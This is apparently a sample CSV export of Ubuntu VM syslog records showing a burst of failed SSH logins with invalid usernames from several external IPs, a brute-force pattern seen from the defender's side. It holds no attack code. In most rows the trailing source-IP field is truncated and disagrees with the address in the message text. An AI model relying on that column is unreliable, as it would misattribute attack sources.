+412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:08,UbuntuDevEnv,2019-06-26 17:42:07,auth,UbuntuDevEnv,info,Disconnected from invalid user qd 157.230.190.1 port 51258 [preauth],53285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qd,157.230.190.1,51258,,
+413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:53,UbuntuDevEnv,2019-06-26 17:42:53,auth,UbuntuDevEnv,info,Invalid user bwadmin from 54.37.66.73 port 42677,53456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwadmin,54.37.66.7,42677,,
+414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:53,UbuntuDevEnv,2019-06-26 17:42:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,53456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:53,UbuntuDevEnv,2019-06-26 17:42:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:56,UbuntuDevEnv,2019-06-26 17:42:55,auth,UbuntuDevEnv,info,Failed password for invalid user bwadmin from 54.37.66.73 port 42677 ssh2,53456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwadmin,54.37.66.7,42677,,
+417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:56,UbuntuDevEnv,2019-06-26 17:42:55,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 42677:11: Bye Bye [preauth],53456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,42677,,
+418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:56,UbuntuDevEnv,2019-06-26 17:42:55,auth,UbuntuDevEnv,info,Disconnected from invalid user bwadmin 54.37.66.73 port 42677 [preauth],53456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bwadmin,54.37.66.7,42677,,
+419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:57,UbuntuDevEnv,2019-06-26 17:42:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:57,UbuntuDevEnv,2019-06-26 17:42:57,auth,UbuntuDevEnv,info,Invalid user anthony from 107.175.127.237 port 57354,53459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anthony,107.175.127.2,57354,,
+421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:57,UbuntuDevEnv,2019-06-26 17:42:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,53459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:59,UbuntuDevEnv,2019-06-26 17:42:58,auth,UbuntuDevEnv,info,Failed password for invalid user anthony from 107.175.127.237 port 57354 ssh2,53459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anthony,107.175.127.2,57354,,
+423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:59,UbuntuDevEnv,2019-06-26 17:42:58,auth,UbuntuDevEnv,info,Disconnected from invalid user anthony 107.175.127.237 port 57354 [preauth],53459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anthony,107.175.127.2,57354,,
+424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:59,UbuntuDevEnv,2019-06-26 17:42:58,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 57354:11: Bye Bye [preauth],53459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,57354,,
+425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:59,UbuntuDevEnv,2019-06-26 17:42:59,auth,UbuntuDevEnv,info,Invalid user song from 77.237.69.165 port 42168,53480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,song,77.237.69.1,42168,,
+426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:59,UbuntuDevEnv,2019-06-26 17:42:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:42:59,UbuntuDevEnv,2019-06-26 17:42:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,53480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:01,UbuntuDevEnv,2019-06-26 17:43:01,auth,UbuntuDevEnv,info,Failed password for invalid user song from 77.237.69.165 port 42168 ssh2,53480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,song,77.237.69.1,42168,,
+429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:02,UbuntuDevEnv,2019-06-26 17:43:01,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 42168:11: Bye Bye [preauth],53480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,42168,,
+430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:02,UbuntuDevEnv,2019-06-26 17:43:01,auth,UbuntuDevEnv,info,Disconnected from invalid user song 77.237.69.165 port 42168 [preauth],53480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,song,77.237.69.1,42168,,
+431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:18,UbuntuDevEnv,2019-06-26 17:43:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:18,UbuntuDevEnv,2019-06-26 17:43:18,auth,UbuntuDevEnv,info,Invalid user bot from 80.108.220.67 port 55530,53531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot,80.108.220.6,55530,,
+433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:18,UbuntuDevEnv,2019-06-26 17:43:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,53531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:20,UbuntuDevEnv,2019-06-26 17:43:20,auth,UbuntuDevEnv,info,Failed password for invalid user bot from 80.108.220.67 port 55530 ssh2,53531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot,80.108.220.6,55530,,
+435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:20,UbuntuDevEnv,2019-06-26 17:43:20,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 55530:11: Bye Bye [preauth],53531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,55530,,
+436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:20,UbuntuDevEnv,2019-06-26 17:43:20,auth,UbuntuDevEnv,info,Disconnected from invalid user bot 80.108.220.67 port 55530 [preauth],53531,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bot,80.108.220.6,55530,,
+437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:25,UbuntuDevEnv,2019-06-26 17:43:24,auth,UbuntuDevEnv,info,Invalid user chong from 111.230.29.17 port 36230,53559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chong,111.230.29.1,36230,,
+438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:25,UbuntuDevEnv,2019-06-26 17:43:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:25,UbuntuDevEnv,2019-06-26 17:43:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,53559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:27,UbuntuDevEnv,2019-06-26 17:43:26,auth,UbuntuDevEnv,info,Failed password for invalid user chong from 111.230.29.17 port 36230 ssh2,53559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chong,111.230.29.1,36230,,
+441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:27,UbuntuDevEnv,2019-06-26 17:43:26,auth,UbuntuDevEnv,info,Disconnected from invalid user chong 111.230.29.17 port 36230 [preauth],53559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chong,111.230.29.1,36230,,
+442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:27,UbuntuDevEnv,2019-06-26 17:43:26,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 36230:11: Bye Bye [preauth],53559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,36230,,
+443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:31,UbuntuDevEnv,2019-06-26 17:43:30,auth,UbuntuDevEnv,info,Invalid user zimbra from 58.87.109.107 port 19282,53586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zimbra,58.87.109.1,19282,,
+444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:31,UbuntuDevEnv,2019-06-26 17:43:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:31,UbuntuDevEnv,2019-06-26 17:43:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,53586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:32,UbuntuDevEnv,2019-06-26 17:43:32,auth,UbuntuDevEnv,info,Failed password for invalid user zimbra from 58.87.109.107 port 19282 ssh2,53586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zimbra,58.87.109.1,19282,,
+447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:33,UbuntuDevEnv,2019-06-26 17:43:32,auth,UbuntuDevEnv,info,Disconnected from invalid user zimbra 58.87.109.107 port 19282 [preauth],53586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zimbra,58.87.109.1,19282,,
+448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:33,UbuntuDevEnv,2019-06-26 17:43:32,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 19282:11: Bye Bye [preauth],53586,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,19282,,
+449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:54,UbuntuDevEnv,2019-06-26 17:43:53,auth,UbuntuDevEnv,info,Invalid user master from 157.230.190.1 port 39600,53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,master,157.230.190.1,39600,,
+450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:54,UbuntuDevEnv,2019-06-26 17:43:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:54,UbuntuDevEnv,2019-06-26 17:43:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:56,UbuntuDevEnv,2019-06-26 17:43:56,auth,UbuntuDevEnv,info,Failed password for invalid user master from 157.230.190.1 port 39600 ssh2,53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,master,157.230.190.1,39600,,
+453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:56,UbuntuDevEnv,2019-06-26 17:43:56,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 39600:11: Bye Bye [preauth],53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,39600,,
+454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:43:56,UbuntuDevEnv,2019-06-26 17:43:56,auth,UbuntuDevEnv,info,Disconnected from invalid user master 157.230.190.1 port 39600 [preauth],53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,master,157.230.190.1,39600,,
+455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:20,UbuntuDevEnv,2019-06-26 17:44:20,auth,UbuntuDevEnv,info,Invalid user tinkerware from 54.37.66.73 port 51281,53776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,54.37.66.7,51281,,
+456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:20,UbuntuDevEnv,2019-06-26 17:44:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,53776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:20,UbuntuDevEnv,2019-06-26 17:44:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:22,UbuntuDevEnv,2019-06-26 17:44:22,auth,UbuntuDevEnv,info,Failed password for invalid user tinkerware from 54.37.66.73 port 51281 ssh2,53776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,54.37.66.7,51281,,
+459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:22,UbuntuDevEnv,2019-06-26 17:44:22,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 51281:11: Bye Bye [preauth],53776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,51281,,
+460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:22,UbuntuDevEnv,2019-06-26 17:44:22,auth,UbuntuDevEnv,info,Disconnected from invalid user tinkerware 54.37.66.73 port 51281 [preauth],53776,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tinkerware,54.37.66.7,51281,,
+461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:55,UbuntuDevEnv,2019-06-26 17:44:54,auth,UbuntuDevEnv,info,Invalid user techuser from 111.230.29.17 port 49614,53899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,techuser,111.230.29.1,49614,,
+462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:55,UbuntuDevEnv,2019-06-26 17:44:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:55,UbuntuDevEnv,2019-06-26 17:44:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,53899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:57,UbuntuDevEnv,2019-06-26 17:44:57,auth,UbuntuDevEnv,info,Failed password for invalid user techuser from 111.230.29.17 port 49614 ssh2,53899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,techuser,111.230.29.1,49614,,
+465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:57,UbuntuDevEnv,2019-06-26 17:44:57,auth,UbuntuDevEnv,info,Disconnected from invalid user techuser 111.230.29.17 port 49614 [preauth],53899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,techuser,111.230.29.1,49614,,
+466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:44:57,UbuntuDevEnv,2019-06-26 17:44:57,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 49614:11: Bye Bye [preauth],53899,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,49614,,
+467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:05,UbuntuDevEnv,2019-06-26 17:45:05,auth,UbuntuDevEnv,info,Invalid user rrashid from 58.87.109.107 port 34368,53972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rrashid,58.87.109.1,34368,,
+468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:06,UbuntuDevEnv,2019-06-26 17:45:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,53972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:06,UbuntuDevEnv,2019-06-26 17:45:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:08,UbuntuDevEnv,2019-06-26 17:45:08,auth,UbuntuDevEnv,info,Failed password for invalid user rrashid from 58.87.109.107 port 34368 ssh2,53972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rrashid,58.87.109.1,34368,,
+471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:08,UbuntuDevEnv,2019-06-26 17:45:08,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 34368:11: Bye Bye [preauth],53972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,34368,,
